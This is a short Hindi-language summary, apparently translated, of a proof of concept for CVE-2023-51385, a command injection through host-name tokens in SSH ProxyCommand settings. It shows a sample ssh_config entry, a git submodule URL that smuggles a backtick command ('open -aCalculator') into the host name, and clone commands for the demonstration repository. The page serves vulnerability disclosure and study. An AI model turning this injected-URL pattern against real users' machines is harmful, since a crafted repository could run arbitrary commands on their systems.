
Proof of concept का उपयोग करके ssh क्लाइंट्स पर असुरक्षित proxycommand कॉन्फ़िगरेशन का शोषण करने के लिए (CVE-2023-51385)
~/.ssh/config के माध्यम से RCEProxyCommand में %h, %p जैसे टोकन का उपयोग सुरंगों और कनेक्शन प्रॉक्सीिंग के लिए SSH का उपयोग करके काफी लोकप्रिय है।
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
नोट: अपने प्रारंभिक मूल्यांकन में मैं इस धारणा के तहत था कि '%h (एकल उद्धरण) का उपयोग इससे बचाएगा, लेकिन ऐसा लगता है कि यह अभी भी इस तरह से कमजोर होगा:
url = ssh://'`open -aCalculator`'foo.example.com/bar
से लिया गया: https://man.openbsd.org/ssh_config#ProxyCommand
एक उपमॉड्यूल जो OSX पर कैलकुलेटर खोलने के लिए इस कमजोरी का शोषण करेगा।
इसे आज़माएं:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
या
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules